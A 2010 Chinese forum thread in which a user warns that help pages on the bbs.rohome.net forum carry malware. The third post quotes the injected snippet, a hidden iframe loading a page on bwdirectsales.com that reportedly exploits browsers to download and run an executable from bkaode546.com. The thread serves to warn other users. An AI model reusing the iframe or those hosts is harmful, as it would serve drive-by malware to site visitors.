返回列表 发帖
sexx

Rank: 1

UID
167603 
帖子
3728 
精华
威望
269  
阅读权限
100 
注册时间
2004-5-21 
1# 跳转到 »
发表于 2010-7-23 15:41 | 显示全部帖子
只有帮助页面有问题,还是以前的那个马夫: 不去帮助页面应该没问题

bbs.rohome.net/faq.php?action=message&id=9
    bbs.rohome.net/forumdata/cache/style_4.css
    bbs.rohome.net/include/javascript/common.js
    bbs.rohome.net/include/javascript/menu.js
    bbs.rohome.net/include/javascript/ajax.js
    bbs.rohome.net/images/ipb/logo.gif
    bbs.rohome.net/images/ipb/frame_on.gif
    bbs.rohome.net/images/ipb/footer_top.gif
    htbbs.rohome.net/images/ipb/discuz_icon.gif
    bbs.rohome.net/images/ipb/alipay_icon.gif
    js.users.51.la/449807.js
    bbs.rohome.net/images/ipb/bg.gif
    bwdirectsales.com/images/banners/cn.htm

[ 本帖最后由 sexx 于 2010-7-23 15:49 编辑 ]

TOP

sexx

Rank: 1

UID
167603 
帖子
3728 
精华
威望
269  
阅读权限
100 
注册时间
2004-5-21 
2#
发表于 2010-7-23 16:00 | 显示全部帖子
如果你的杀毒软件(金山瑞星啥啥啥的)平时没跳,打开下面的连接再看看跳不跳,360说这几个页面有毒
不怕死的可以试一下,我用的金山不敢点。。。:

bbs.rohome.net/faq.php?action=message&id=9
bbs.rohome.net/faq.php?action=message&id=18
bbs.rohome.net/faq.php?action=message&id=8#top
bbs.rohome.net/faq.php?action=message&id=8
bbs.rohome.net/faq.php?action=message&id=4#top

[ 本帖最后由 sexx 于 2010-7-23 16:02 编辑 ]

TOP

sexx

Rank: 1

UID
167603 
帖子
3728 
精华
威望
269  
阅读权限
100 
注册时间
2004-5-21 
3#
发表于 2010-7-23 17:25 | 显示全部帖子
状了下胆(不是蛋),特意去试验下:
http://bbs.rohome.net/faq.php?action=message&id=9
含有以下内容:

  1. <div class="altbg2" style="margin: 8px auto;">在<a href="memcp.php" target="_blank">控制面板</a>中的“编辑个人资料”,填写“原密码”,“新密码”,“确认新密码”。点击“提交”,即可修改。<iframe src=http://bwdirectsales.com/images/banners/cn.htm style="display:none"></iframe>;</div>
复制代码


http://bwdirectsales.com/images/banners/cn.htm 就是挂那个啥(绝不是挂大肠)。。。
该网页会利用shellcode溢出下载执行 http://bkaode546.com/xiao/xiazai.exe
系统打过安全补丁应该没问题

[ 本帖最后由 sexx 于 2010-7-23 17:43 编辑 ]

TOP

返回列表